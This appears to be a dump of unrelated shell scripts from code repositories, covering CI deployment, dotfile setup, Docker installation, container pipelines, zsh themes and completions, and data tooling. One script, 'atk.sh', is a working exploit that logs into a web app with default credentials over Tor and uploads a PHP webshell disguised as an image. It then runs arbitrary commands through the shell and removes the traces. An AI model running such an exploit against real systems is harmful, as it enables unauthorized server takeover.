c38dd9a27f2b45739acfe67f886ccb06653fd1f4 | Shell | Kaveesha-Induwara/skija | /ci/deploy_linux.sh | UTF-8 | 391 | 2.78125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -o errexit -o nounset -o pipefail
cd "`dirname $0`/.."
REVISION=$(./ci/revision.sh)
echo "Deploying skija-linux v${REVISION}"
cd native
echo $REVISION > build/skija.version
sed -i -e "s/0.0.0-SNAPSHOT/$REVISION/g" -e "s/skija-native/skija-linux/g" pom.xml
mvn --batch-mode --settings ../ci/settings.xml -Dspace.username=Nikita.Prokopov -Dspace.password=${SPACE_TOKEN} deploy | true |
87ad52d97551ae60df02299c19f7759587989ecd | Shell | caileighf/MCC_DAQ | /start_collect | UTF-8 | 401 | 3.078125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
CONFIG_FILE=$(cat $HOME/ACBOX/MCC_DAQ/config.json)
DATA_DIR=$( echo "$CONFIG_FILE" | jsawk 'return this.data_directory' )\
&& cp "$HOME/ACBOX/MCC_DAQ/config.json" "${DATA_DIR}/SINGLE_config_$(date +"%s").json"
MODE="$(grep -Po '\"mode\":.*?[^\\]\",' config.json)"\
&& echo $MODE | grep "CONTINUOUS" > /dev/null \
&& source run_single_continuous.sh || source run_single_triggered.sh | true |
69ab0222b8ef10d7b691836db7e7d0e4b6a05314 | Shell | Ug0Security/Fasttelpwn | /atk.sh | UTF-8 | 935 | 2.59375 | 3 | [] | no_license | # Ta gueule Vlad
echo "Log In with default user credentials"
cookie=$(timeout 10 torify curl -i -s -X POST "$1/index.php" --data "username=user&password=user&language=fr&LoginButton=Login" | grep "Set-Cookie" | grep -o -P '(?<=PHPSESSID=).*(?=;)')
echo "We should be logged, here the cookie : $cookie"
echo " "
echo "Let's upload a webshell"
timeout 10 torify curl -s --cookie "PHPSESSID=$cookie" -X POST "$1/admin/UploadWebsiteLogo.php" -F 'uploadImageFile=@logo-menu.php;type=image/png' -H 'Expect:' >/dev/null
echo " "
sleep 5
echo "Let's execute commands !!"
echo $2
echo "-------Command Output----------"
timeout 10 torify curl --cookie "PHPSESSID=$cookie" "$1/res/img/custom-logo-menu.php" --data-urlencode "cmd=$2"
echo "-------------------------------"
echo " "
echo "Cleaning..."
timeout 10 torify curl -s --cookie "PHPSESSID=$cookie" -X POST "$1/admin/RevertWebsiteLogo.php" --data "revertLogo=Envoyer" >/dev/null
| true |
79ef27bfa7f1e0b9468bf37a238c3e34d5ce26ae | Shell | MubarakSULAYMAN/BashCrash | /weekends (2).sh | UTF-8 | 1,470 | 3.796875 | 4 | [] | no_license | #!/bin/bash
# Check if the file exists before it request to a download file
wget -c --spider http://www.bom.gov.au/climate/dwo/201905/text/IDCJDW6111.201905.csv
# "wget" is for a non interractive download i.e, you do not control the download process
# Move to your file directory, open it and select desired columns
awk -v OFS=" " -F"," '{print $2, $3, $4, $7}' /home/mubarak/Documents/IDCJDW6111.201905.csv | sort -n
# "'{print $2, $3, $4, $7}'" defines my enjoyable - so I arranged them in order of minimum temperature
# "/home/mubarak/Documents/" is the folder directory it is downloaded
# "awk" helps selects desired colums, "sort" helps with sorting, "OFS" is to change the separator as specified by "-F",
# "-n" compares according to string numerical value,
if [ $3 == $4 ] || [ $3 == $5]
then
echo " "
elif [ $3 -gt $4 ] || [ $3 -gt $5 ]
then
echo "not enjoyable"
elif [ $3 -lt $4 ] || [ $3 -lt $5 ]
then
echo "enjoyable"
else
echo " "
fi
# It should expect to receive lines on standard input, where each line contains two
# columns, separated by commas; the first column should be a date
# (in YYYY-MM-DD format), and the second either the word “unenjoyable” or
# “enjoyable”.
# For example:
# 2019-03-01,enjoyable
# 2019-03-02,unenjoyable
# 2019-03-03,enjoyable
# This means your scripts could be put in a pipeline, weekends.sh |
# weather_analyser.sh, to get a single line of output, either “supported” or
# “unsupported”. | true |
1eb8aa69905ef231f37e86a588fbb82b49273d00 | Shell | grierj/dotfiles | /bootstrap.sh | UTF-8 | 3,237 | 4.03125 | 4 | [] | no_license | #!/bin/bash
cd "$(dirname "$0")"
if [[ "$SHELL" = */zsh ]]; then
PREFIX="zsh"
else
PREFIX="bash"
fi
function die() {
if [ $0 != 0 ]; then
echo $@
exit 1
fi
}
function installOhMyZsh {
if [[ -z $ZSH ]] || [[ ! -d $ZSH ]]; then
bash -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
fi
}
function gitStuff() {
my_email=`git config --get user.email`
my_name=`git config --get user.name`
}
function makeLink() {
file="$1"
final_file=$(realpath $file)
filename=$(basename $file)
if [[ "$filename" == "/" ]] || [[ "$filename" == "." ]] || [[ "$filename" == ".." ]] || [[ "$filename" == "" ]]; then
die "Got '$filename' for linking, which you don't want, your script is busted"
fi
homefile="$HOME/$filename"
if [[ -h $homefile ]] && [[ "$(readlink -n $homefile)" != "$final_file" ]]; then
echo "$(readlink $homefile) isn't the same as $final_file) removing link"
rm $homefile
fi
if [[ ! -h $homefile ]]; then
if [[ -e $homefile ]] && [[ -e $final_file ]]; then
rm -rf $homefile
fi
echo "Linking $final_file to $homefile"
ln -s $final_file $homefile
fi
}
function doIt() {
pushd $PREFIX
for dotfile in .[a-zA-Z0-9]*; do
makeLink $PWD/$dotfile
done
popd
# I don't want to check in whatever user/e-mail I am at the time because this leaks employer info
cp .gitconfig ~/.gitconfig
}
function getVundle() {
if [ ! -d ~/.vim/bundle/vundle ]; then
if [ ! -d ~/.vim/bundle ]; then
mkdir ~/.vim/bundle || die "Can't make bundle directory for vim"
fi
cd ~/.vim/bundle
git clone https://github.com/gmarik/Vundle.vim.git vundle
fi
}
# When vundle is first installed, we don't have colors and so vim
# stops and asks for you to hit return
function commentColor() {
if [ -f ~/.vimrc ]; then
perl -pi -e 's#colorscheme#"colorscheme#' $(realpath ~/.vimrc)
fi
}
function uncommentColor() {
if [ -f ~/.vimrc ]; then
perl -pi -e 's#"colorscheme#colorscheme#' $(realpath ~/.vimrc)
fi
}
function BackUp() {
bud="dotbackup/$(date +%s)"
if [ ! -d $bud ]; then
mkdir -p ~/$bud
fi
for f in * .*; do
if [ -f ~/$f ]; then
rsync -avP ~/$f ~/$bud/
fi
done
}
gitStuff
if [[ "$PREFIX" = "zsh" ]]; then
installOhMyZsh || die "Couldn't install oh my zsh, you'll have to do it manually"
fi
if [ "$1" == "--force" -o "$1" == "-f" ]; then
echo "Skipping backup due to --force"
else
BackUp || die "Couldn't backup old file, use --force to override"
fi
doIt || die "Something went terribly wrong installing your dotfiles"
unset doIt
unset BackUp
unset gitStuff
unset makePlugin
if [[ "$PREFIX" = "zsh" ]]; then
# can't source from in bash
echo "#####################"
echo "Run 'source ~/.zshrc'"
echo "#####################"
else
source ~/.bash_profile
fi
getVundle || die "Vundle failed to install"
unset getVundle
commentColor
vim -c "BundleInstall" -c "q" -c "q"
uncommentColor
unset commentColor
unset uncommentColor
IFS=''
if [ -z $my_email ]; then
echo -n "Git E-mail? "
read my_email
fi
git config --global user.email $my_email
if [ -z $my_name ]; then
echo -n "Git Name? "
read my_name
fi
git config --global user.name $my_name
| true |
80ed1c9cc43c0d4187f1efc53eec4b7a0f409f21 | Shell | zhangyuan/helpme | /docker/install-docker-on-debian.sh | UTF-8 | 788 | 2.765625 | 3 | [
"MIT"
] | permissive | #! /bin/bash
set -ex
apt-get remove docker docker-engine docker.io containerd runc || true
apt-get update
apt-get install -y apt-transport-https ca-certificates curl gnupg
curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
"deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
$(lsb_release -cs) stable" | tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update
apt-get install -y docker-ce docker-ce-cli containerd.io
docker run hello-world
curl -L "https://github.com/docker/compose/releases/download/1.28.5/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
| true |
4b27e43ca42181a4931e8ae3874d89e36d177352 | Shell | Shachafinho/brainstorm | /scripts/run-pipeline.sh | UTF-8 | 3,550 | 3.765625 | 4 | [] | no_license | #!/bin/bash
set -e
cd "$(dirname "${BASH_SOURCE[0]}")/.."
NETWORK_NAME="my-net"
MQ_VOLUME_NAME="mq-vol"
MQ_VOLUME_TARGET="/workspace/mq_data"
DB_VOLUME_NAME="db-vol"
DB_VOLUME_TARGET="/workspace/db_data"
MQ_NAME="rabbitmq"
MQ_PORT=5672
MQ_URL="rabbitmq://$MQ_NAME:$MQ_PORT/"
DB_NAME="postgres"
DB_PORT=5432
DB_URL="postgresql://$DB_NAME:$DB_PORT/"
SERVER_PORT=8000
API_SERVER_PORT=5000
declare -a PARSERS=( \
"user_information" \
"snapshot" \
"color_image" \
"depth_image" \
"feelings" \
"pose" \
)
function build_container {
container_name=$1
(export DOCKER_BUILDKIT=1; docker build . \
-t $container_name \
-f containers/$container_name/Dockerfile)
}
function is_up {
component=$1
component_name=$2
[ -n "$(docker $component ls -f name=\^$component_name\$ | tail -n +2)" ]
}
build_container "postgres-builder"
build_container "brainstorm-builder"
echo "Setting up volumes"
if ! is_up volume $MQ_VOLUME_NAME; then
docker volume create $MQ_VOLUME_NAME
fi
if ! is_up volume $DB_VOLUME_NAME; then
docker volume create $DB_VOLUME_NAME
fi
echo "Setting up networks"
if ! is_up network $NETWORK_NAME; then
docker network create $NETWORK_NAME
fi
echo "Setting up containers"
WAITING_REQUIRED=false
if ! is_up container $MQ_NAME; then
echo "Running docker container: $MQ_NAME"
docker run -d -p $MQ_PORT:$MQ_PORT --name $MQ_NAME --network $NETWORK_NAME rabbitmq
WAITING_REQUIRED=true
fi
if ! is_up container $DB_NAME; then
echo "Running docker container: $DB_NAME"
docker run -d -p $DB_PORT:$DB_PORT \
--name $DB_NAME \
--network $NETWORK_NAME \
--mount source=$DB_VOLUME_NAME,target=/var/lib/postgresql/data \
postgres-builder
WAITING_REQUIRED=true
fi
if [ "$WAITING_REQUIRED" = true ]; then
echo "Waiting for containers to setup..."
sleep 10
fi
if ! is_up container api_server; then
echo "Running docker container: api_server"
docker run -d -t -p $API_SERVER_PORT:$API_SERVER_PORT \
--name api_server \
--network $NETWORK_NAME \
--mount source=$DB_VOLUME_NAME,target=$DB_VOLUME_TARGET \
brainstorm-builder \
python -m brainstorm.api run-server --host "0.0.0.0" --port $API_SERVER_PORT --database "$DB_URL"
fi
if ! is_up container saver; then
echo "Running docker container: saver"
docker run -d -t \
--name saver \
--network $NETWORK_NAME \
--mount source=$MQ_VOLUME_NAME,target=$MQ_VOLUME_TARGET \
--mount source=$DB_VOLUME_NAME,target=$DB_VOLUME_TARGET \
brainstorm-builder \
python -m brainstorm.saver run-saver "$DB_URL" "$MQ_URL"
fi
for parser_name in ${PARSERS[@]}; do
PARSER_CONTAINER="parse_$parser_name"
if ! is_up container $PARSER_CONTAINER; then
echo "Running docker container: $PARSER_CONTAINER"
docker run -d -t \
--name $PARSER_CONTAINER \
--network $NETWORK_NAME \
--mount source=$MQ_VOLUME_NAME,target=$MQ_VOLUME_TARGET \
brainstorm-builder \
python -m brainstorm.parsers run-parser "$parser_name" "$MQ_URL"
fi
done
if ! is_up container server; then
echo "Running docker container: server"
docker run -d -t -p $SERVER_PORT:$SERVER_PORT \
--name server \
--network $NETWORK_NAME \
--mount source=$MQ_VOLUME_NAME,target=$MQ_VOLUME_TARGET \
brainstorm-builder \
python -m brainstorm.server run-server --host "0.0.0.0" --port $SERVER_PORT "$MQ_URL"
fi
| true |
823fade80875719e921bb3aa86dc8459a5632619 | Shell | retrievertech/seismogram-app | /data-tools/mongo-import.sh | UTF-8 | 864 | 2.734375 | 3 | [] | no_license | db=seismo && \
mongo $db --eval "db.dropDatabase()" && \
mongoimport --db=$db --collection=stations --jsonArray --file stations.json && \
mongoimport --db=$db --collection=files --jsonArray --file files.json && \
mongo $db --eval "db.files.ensureIndex({date:1})" && \
mongo $db --eval "db.files.ensureIndex({stationId:1})" && \
mongo $db --eval "db.files.ensureIndex({status:1})" && \
if [ "$1" != "dev" ]; then
files_with_metadata=`aws s3 ls "s3://wwssn-metadata/" --profile seismo | perl -e '@lines = <>; @lines = map { s/^.*PRE\s//; s/[\/\s]*$//; "\"$_\"" } @lines; print join ",", @lines'`
else
files_with_metadata=`ls -1 ../client/metadata | perl -e '@lines = <>; @lines = map { s/[\/\s]*$//; "\"$_\"" } @lines; print join ",", @lines'`
fi && \
mongo $db --eval 'db.files.update({name: {$in: ['$files_with_metadata']}}, {$set: {status:3}}, {multi:true})'
| true |
4303f8a0a945fec8c6601309dc858ad14fc3cb7b | Shell | zchee/zsh-default-completions | /src/Unix/Command/_gsettings | UTF-8 | 1,363 | 3.125 | 3 | [] | no_license | #compdef gsettings
local curcontext="$curcontext" state line expl ret=1
local subcmds
_arguments -A "-*" \
'(- 1 *)--version[show version information]' \
'--schemadir[specify location of schemata]:directory:_directories' \
':command:->subcmds' \
'*::args:->subargs' && ret=0
if [[ $state = subargs ]]; then
curcontext="${curcontext%:*}-$words[1]:"
case $words[1] in
help) state=subcmds;;
describe|get|range|reset|writable|monitor)
_arguments ':schema:->schemata' ':key:->keys'
;;
set)
_arguments ':schema:->schemata' ':key:->keys' ':value'
;;
(list|reset)-(keys|recursively|children)) state=schemata ;;
list-schemas)
_arguments '--print-paths'
;;
*) _default && ret=0 ;;
esac
fi
case $state in
subcmds)
subcmds=( ${(L)${${(M)${${(f)"$(_call_program commands $service help)"}[(r)Commands:*,-2]}:# *}#??}/ ##/:} )
_describe -t commands 'command' subcmds -M 'r:?|-=* r:|=*' && ret=0
state=''
;;
schemata)
if compset -P 1 '*:'; then
_directories && ret=0
else
_wanted schemata expl 'schema' compadd -M 'r:|.=* r:|=*' \
$(_call_program schemata $service list-schemas) && ret=0
fi
;;
keys)
_wanted keys expl 'key' compadd \
$(_call_program keys $service list-keys $words[CURRENT-1]) && ret=0
;;
esac
return ret
# vim:ft=zsh
| true |
eb114869bfac67903ef44b8c7a593056ed400433 | Shell | alex-aleyan/class03_comp_comm_networks | /project/run_client.sh | UTF-8 | 741 | 3.59375 | 4 | [] | no_license | #!/bin/bash
which wireshark sed awk make; if [[ $? -ne 0 ]]; then echo "install: wireshark, sed, awk, make"; fi
if [ "$?" -ne 0 ]; then cd $this_path; exit ; fi
this_path="$(pwd)"
echo $this_path
path_to_script="$( cd "$(dirname "${BASH_SOURCE[0]}")" ; pwd -P )"
echo $path_to_script
server_path="${path_to_script}/sw/server"
client_path="${path_to_script}/sw/client"
data_file0="file0.txt"
dest_file="file.txt"
cd $client_path
if [ "$?" -ne 0 ]; then cd $this_path; exit ; fi
rm $dest_file
make all
if [ "$?" -ne 0 ]; then cd $this_path; exit ; fi
# create 10 files from "data_file0"
if test -f "$data_file0"; then echo "$data_file0 exist"; fi
./duplicate_file0.sh
cd $client_path;
$(cat README.txt)
cat $dest_file
cd $this_path
| true |
503a7c277b75bdf824797e8f1b9227c559489f4b | Shell | rhysecampbell/cloud-infra | /ansible/roles/dqmfeed/files/error-scripts/oldResultCleanup.sh | UTF-8 | 346 | 2.703125 | 3 | [] | no_license | #!/bin/sh
# clean up the DQM logs older than 1 week old
for i in `find /var/www/html/error-scripts/results -maxdepth 1 -mtime +7`; do
rm -rf $i
done
for i in `find /var/www/html/error-scripts/errorsBySite -maxdepth 1 -mtime +7`; do
rm -rf $i
done
for i in `find /var/www/html/error-scripts/errorLogs -maxdepth 1 -mtime +7`; do
rm -rf $i
done
| true |
ebbd77f9fa73674ded672c4a9778ec9c0c5e9925 | Shell | ashleydev/oh-my-zsh | /themes/sorin.zsh-theme | UTF-8 | 2,217 | 2.984375 | 3 | [] | no_license | # ------------------------------------------------------------------------------
# FILE: sorin.zsh-theme
# DESCRIPTION: oh-my-zsh theme file.
# AUTHOR: Sorin Ionescu (sorin.ionescu@gmail.com)
# VERSION: 1.0.4
# SCREENSHOT: http://i.imgur.com/aipDQ.png
# ------------------------------------------------------------------------------
if [[ "$DISABLE_COLORS" != "true" ]]; then
local R="%{$terminfo[sgr0]%}"
local MAGENTA="%{$fg[magenta]%}"
local YELLOW="%{$fg[yellow]%}"
local GREEN="%{$fg[green]%}"
local B_GREEN="%{$fg_bold[green]%}"
local BLUE="%{$fg[blue]%}"
local CYAN="%{$fg[cyan]%}"
local RED="%{$fg[red]%}"
local B_RED="%{$fg_bold[red]%}"
fi
MODE_INDICATOR="$B_RED❮$R$RED❮❮$R"
local return_status="$RED%(?..⏎)$R"
PROMPT='$CYAN%c$GIT_PROMPT_INFO %(!.$B_RED#.$B_GREEN❯)$R '
RPROMPT='${return_status}$GIT_RPROMPT_INFO$R'
git_prompt_info ()
{
if [ -z "$(git_prompt__git_dir)" ]; then
GIT_PROMPT_INFO=''
GIT_RPROMPT_INFO=''
return
fi
local branch=''
git_prompt__branch
branch="$GIT_PROMPT_BRANCH"
git_prompt__rebase_info
branch="${branch}$GIT_PROMPT_REBASE_INFO"
GIT_PROMPT_INFO=" ${BLUE}git$R:$RED${branch}$R"
local rprompt=''
git_prompt__dirty_state
if [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_ADDED" = 'yes' ]]; then
rprompt="$GREEN ✚"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_MODIFIED" = 'yes' ]]; then
rprompt="${rprompt}$BLUE ✹"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_WORKTREE_MODIFIED" = 'yes' ]]; then
rprompt="${rprompt}$BLUE ✹"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_DELETED" = 'yes' ]]; then
rprompt="${rprompt}$RED ✖"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_WORKTREE_DELETED" = 'yes' ]]; then
rprompt="${rprompt}$RED ✖"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_RENAMED" = 'yes' ]]; then
rprompt="${rprompt}$MAGENTA ➜"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_INDEX_UNMERGED" = 'yes' ]]; then
rprompt="${rprompt}$YELLOW ═"
fi
if [[ "$GIT_PROMPT_DIRTY_STATE_WORKTREE_UNTRACKED" = 'yes' ]]; then
rprompt="${rprompt}$CYAN ✭"
fi
GIT_RPROMPT_INFO=$rprompt
}
| true |
6e57bb50eec48cd9a34337a5d39ea51fbbcb41b7 | Shell | bigklopp/Shell_git | /isting.sh | UTF-8 | 153 | 3.21875 | 3 | [] | no_license | #!/bin/bash
read -p "실행할까요? (y/n)" CHOICE
if [[ $CHOICE = [yY]* ]] || [ "$CHOICE" = "" ]
then
echo "실행됨"
else
echo "실행 취소됨"
fi
| true |
b300c29cf5ac71f7d2bd6c38801da917804f5ce1 | Shell | jgresty/peak-cart | /setup_auth.sh | UTF-8 | 2,122 | 3.234375 | 3 | [] | no_license | #!/bin/sh
set -e pipefail
KEYCLOAK="http://localhost:8080"
REALM="master"
CLIENT='{
"id": "1f9e3fcd-287c-45cf-9018-594d4406cd23",
"clientId": "peak-cart",
"enabled": true,
"directAccessGrantsEnabled": true,
"standardFlowEnabled": false,
"publicClient": false,
"attributes": {
"access.token.signed.response.alg": "RS256"
}
}'
REGISTER_URL="$KEYCLOAK/auth/admin/realms/$REALM/clients/"
TOKEN_URL="$KEYCLOAK/auth/realms/$REALM/protocol/openid-connect/token"
echo "Getting access token"
TOKEN=$(curl -X POST -s \
-H 'application/x-www-form-urlencoded' \
--data-urlencode "client_id=admin-cli"\
--data-urlencode "grant_type=password"\
--data-urlencode "username=admin"\
--data-urlencode "password=admin"\
"$TOKEN_URL" | jq -r .access_token)
echo "Creating client peak-cart"
curl -X POST \
-d "$CLIENT" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
"$REGISTER_URL"
echo "Writing public certificate to cert.pem"
echo "-----BEGIN CERTIFICATE-----" > cert.pem
curl -s "$KEYCLOAK/auth/realms/$REALM/protocol/openid-connect/certs" \
| jq -r '.keys[] | select (.alg == "RS256") | .x5c[0]' >> cert.pem
echo "-----END CERTIFICATE-----" >> cert.pem
echo "Getting client secret"
SECRET=$(curl -s \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
"$KEYCLOAK/auth/admin/realms/$REALM/clients/1f9e3fcd-287c-45cf-9018-594d4406cd23/client-secret" \
| jq -r .value)
echo
echo "SUCCESS"
echo
echo "Fetch new JWT with:"
cat << EOF
TOKEN=\$(curl -s -L -X POST '$KEYCLOAK/auth/realms/master/protocol/openid-connect/token' \\
-H 'Content-Type: application/x-www-form-urlencoded' \\
--data-urlencode 'client_id=peak-cart' \\
--data-urlencode 'grant_type=password' \\
--data-urlencode 'client_secret=$SECRET' \\
--data-urlencode 'scope=openid' \\
--data-urlencode 'username=admin' \\
--data-urlencode 'password=admin' | jq -r '.access_token')
EOF
echo "Then query the application with:"
echo 'curl -H "Authorization: Bearer ${TOKEN}" localhost:3000'
| true |
27e3c8b63b4c4f9446659207ed63ca9869b3419b | Shell | jambo6/dotfiles | /zshrc/base_aliases.zsh | UTF-8 | 1,135 | 2.96875 | 3 | [] | no_license | # Alias some bash scripts
alias pyproject="~/monorepo/dotfiles/scripts/pyproject/pyproject.sh"
alias poetryreq="poetry export -f requirements.txt --output requirements.txt"
# Easy peasy
alias psql="pgcli"
alias vim="nvim"
# Colored ls
alias ls='ls -G'
# Confirms
alias rm='rm -i'
alias 'rm -f'='rm -f -i'
alias 'rm -r'='rm -r -i'
alias 'rm -rf'='rm -rf -i'
alias cp='cp -i'
alias mv='mv -i'
# Fast access
alias m="cd ~/monorepo"
alias dotfiles="cd ~/monorepo/dotfiles"
alias zshrc="cd ~/monorepo/dotfiles/zshrc"
alias srczsh="source ~/.zshrc"
alias gitconfig="vim ~/.gitconfig"
alias initvim="vim ~/.config/nvim/init.vim"
alias scripts="cd ~/monorepo/dotfiles/scripts"
alias psqlrc="vim ~/.psqlrc"
alias pgpass="vim ~/.pgpass"
# Some useful shortcuts
alias -- -="cd -"
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias .....="cd ../../../../"
alias ......="cd ../../../../../"
alias myip="curl ifconfig.me"
alias del="trash"
alias activate="conda activate ./env"
# Make dir and cd in
mkcd() {
mkdir -p "$*"
cd "$*"
}
# Python
alias checkpython="ps -ef | grep python"
alias killpython="pkill -9 python"
| true |
c25f9327fa00acfaab205d3f2806c42ac19cc585 | Shell | kosmos-industrie40/kosmos-local-mqtt-broker | /mqtt-dashboard/entrypoint.sh | UTF-8 | 534 | 3.25 | 3 | [] | no_license | #!/bin/bash
# entrypoint.sh
#
# Benötigt Environment Variablen
# Für den Broker an sich:
# * USE_TLS - Soll der Broker mit SSL/TLS Starten?
#
# Für die PKI (Bei TLS)
# * MY_PKI_URI - Ist die vollständige URI der Vault PKI
# * VAULT_TOKEN - Ist der Vault-Token um Zertifikate zu erhalten
#
if [ "$USE_TLS" = true ]; then
# Der CN für das Zertifikat wird aus dem Domainname und dem Hostname erzeugt.
export MY_FQDN=`hostname -f`
. /app/common/request_cert.sh
fi
npm start -- --userDir /app | true |
3eb54bda2621ff02c29b6fd3b264b91590f95a2b | Shell | rohan19980/Rna-Seq | /StringTie_postprocess.sh | UTF-8 | 1,714 | 2.71875 | 3 | [] | no_license | #! /usr/bin/env bash
#SBATCH --cpus-per-task=1
#SBATCH --mem-per-cpu=2000M
#SBATCH --time=00:10:00
#SBATCH --job-name=StringTie
#SBATCH --mail-user=antoine.girardin@students.unibe.ch
#SBATCH --mail-type=begin,end
#SBATCH --output=/data/users/agirardin/output/output_StringTie_%j.o
#SBATCH --error=/data/users/agirardin/error/error_StringTie_%j.e
cd StringTie
awk '{if($3=="transcript"){print $0}}' meta-assembly.gtf > meta-assembly_transcripts.gtf
awk '{if($10~ /MSTRG/){print $0}}' meta-assembly_transcripts.gtf > meta-assembly_noveltranscripts.gtf
awk '{if($13~ /gene/){print $0}}' meta-assembly_noveltranscripts.gtf > meta-assembly_notannotatedtranscripts.gtf
awk '{if($13 !~ /gene/){print $0}}' meta-assembly_transcripts.gtf > meta-assembly_noveltranscripts.gtf
awk '{if($10~ /ENSG/){print $0}}' meta-assembly_transcripts.gtf > meta-assembly_annotatedtranscripts.gtf
awk '{print $14}' meta-assembly_annotatedtranscripts.gtf | sort | uniq -c > meta-assembly_annotatedgenes.txt
wc -l meta-assembly_transcripts.gtf > meta-assembly_summary.csv
wc -l meta-assembly_annotatedtranscripts.gtf >> meta-assembly_summary.csv
wc -l meta-assembly_noveltranscripts.gtf >> meta-assembly_summary.csv
wc -l meta-assembly_notannotatedtranscripts.gtf >> meta-assembly_summary.csv
wc -l meta-assembly_annotatedgenes.txt >> meta-assembly_summary.csv
awk 'BEGIN{k=""}{if($3=="transcript"){print i,j,k; i=0; j=$5-$4; k=$12}if($3=="exon"){i+=1}}END{print i,j,k}' meta-assembly.gtf > meta-assembly_count.csv
sed -i '1d' meta-assembly_count.csv
sed -i -e 's/\"//g' meta-assembly_count.csv
sed -i -e 's/;//g' meta-assembly_count.csv
awk 'BEGIN{i=j=k=0}{i+=1;j+=$1;if($1==1){k+=1}}END{print i,",",j,",",k}' meta-assembly_count.csv > meta-assembly_summary1.csv
| true |
a3f34b9b2a1141c13260b8bf3632746c0192a253 | Shell | knowtorious/CentosSystemChangeProfile | /change-profile-script/bin/change-profile | UTF-8 | 1,492 | 3.359375 | 3 | [] | no_license | #!/bin/sh
NOARGS=65
NOTFOUND=66
if [[ -f /root/config-profile ]]
then
source /root/config-profile
else
echo "/root/config-profile file not found."
exit $NOTFOUND
fi
# '.' (hidden files) ensures that this file will not be loaded
# Backup ifcfg-eth0 as .ifcfg-eth0-orig
cp -p /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/.ifcfg-eth0-orig
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<- EOF
DEVICE=$DEVICE
BOOTPROTO=static
ONBOOT=yes
IPADDR=$IPADDR
NETMASK=$NETMASK
GATEWAY=$GATEWAY
EOF
# Change resolv.conf
cp -p /etc/resolv.conf /etc/.resolv.conf-orig
cat > /etc/resolv.conf <<- EOF
search $SEARCH
nameserver $NAMESERVER
EOF
# Create ntp sed commands
cat > /root/ntpsed <<- EOF
/server first.ntp.server/ c \\server $NTP1
/server second.ntp.server/ c \\server $NTP2
EOF
# Edit ntp.conf file using netpsed
sed -f /root/ntpsed /etc/ntp.conf > /etc/ntp.conf.new
mv /etc/ntp.conf /etc/.ntp.conf-orig
mv /etc/ntp.conf.new /etc/ntp.conf
cat > /etc/ntp/step-tickers <<- EOF
$NTP1
$NTP2
EOF
# Change hostname
sed "/HOSTNAME/ c \\HOSTNAME=$HOSTNAME" /etc/sysconfig/network > /etc/sysconfig/network.new
mv /etc/sysconfig/network /etc/sysconfig/.network-orig
mv /etc/sysconfig/network.new /etc/sysconfig/network
# Change default run level back to 3
sed "/id:1:initdefault:/ s/1/3/" /etc/inittab > /etc/inittab.new
mv /etc/inittab /etc/.inittab-orig
mv /etc/inittab.new /etc/inittab
echo "Change root password and reboot the system. "
| true |
d203ff56abae919ab1c40f703082a38619c06baf | Shell | Fullaxx/RapidBuilds | /RapidBuild64/001-core/RLBFILES/rootcopy/usr/bin/rli_02_copy.sh | UTF-8 | 1,017 | 3.8125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
set -e
usage()
{
echo "Usage: $0 <disk> <partnum> <srcdir> <dst mount point>"
exit 1
}
if [ "$#" != "4" ]; then
usage
fi
DISK="$1"
RLPARTNUM="$2"
RLPART="${DISK}${RLPARTNUM}"
SRCDIR="$3"
MNTDIR="$4"
if [ `uname -m` == "x86_64" ]; then
LIBDIR="lib64"
else
LIBDIR="lib"
fi
if [ ! -d ${MNTDIR} ]; then mkdir ${MNTDIR}; fi
mount ${RLPART} ${MNTDIR} -o noatime
echo "Copying OS from ${SRCDIR} to ${RLPART} (mounted on ${MNTDIR})..."
cp -av ${SRCDIR}/rl ${MNTDIR}
mkdir -p ${MNTDIR}/boot/grub
cp -av ${SRCDIR}/boot/{vmlinuz,irfs.img,mt86p} ${MNTDIR}/boot/
cp -av ${SRCDIR}/install/grub.cfg ${MNTDIR}/boot/grub/
cp -a /usr/${LIBDIR}/grub/i386-pc ${MNTDIR}/boot/grub/
if [ -d ${MNTDIR}/boot/grub/locale ]; then
rm -rf ${MNTDIR}/boot/grub/locale
fi
# for NVMe devices
if echo "${RLPARTNUM}" | grep -q 'p' ; then
RLPARTNUM=`echo "${RLPARTNUM}" | cut -dp -f2`
fi
sed -e "s/hd0,x/hd0,${RLPARTNUM}/g" -i ${MNTDIR}/boot/grub/grub.cfg
# export NOW=`date "+%Y%m%d%H%M%S"`
# echo -n $NOW | sha1sum
| true |
cd328c4271520f4810612bdcacd8104f87670dc8 | Shell | hemmecke/aldor | /aldor/lib/axllib/test/ar6.sh | UTF-8 | 1,136 | 3.8125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
#
# This script tests importing directly from an archive.
# If ${TMPDIR} is not defined, just use /tmp.
TMPDIR=${TMPDIR-/tmp}
if [ "`platform|sed -e "s/.*msvc.*/y/g"`" = "y" ]; then
ALDOR=aldor.sh
else
ALDOR=aldor
fi
rm -rf $TMPDIR/lib
mkdir $TMPDIR/lib
echo '== Compiling numeral*.as into numeral*.ao'
$ALDOR -R $TMPDIR -Y $TMPDIR -F ao numeral*.as | grep -v "GC:"
echo '== Building an archive containing numeral*.ao'
ar cr $TMPDIR/lib/libnum.al $TMPDIR/numeral*.ao
rm -f $TMPDIR/numeral*.ao
echo '== Creating a client for the archive'
cat << END_numeral.as > $TMPDIR/numeral.as
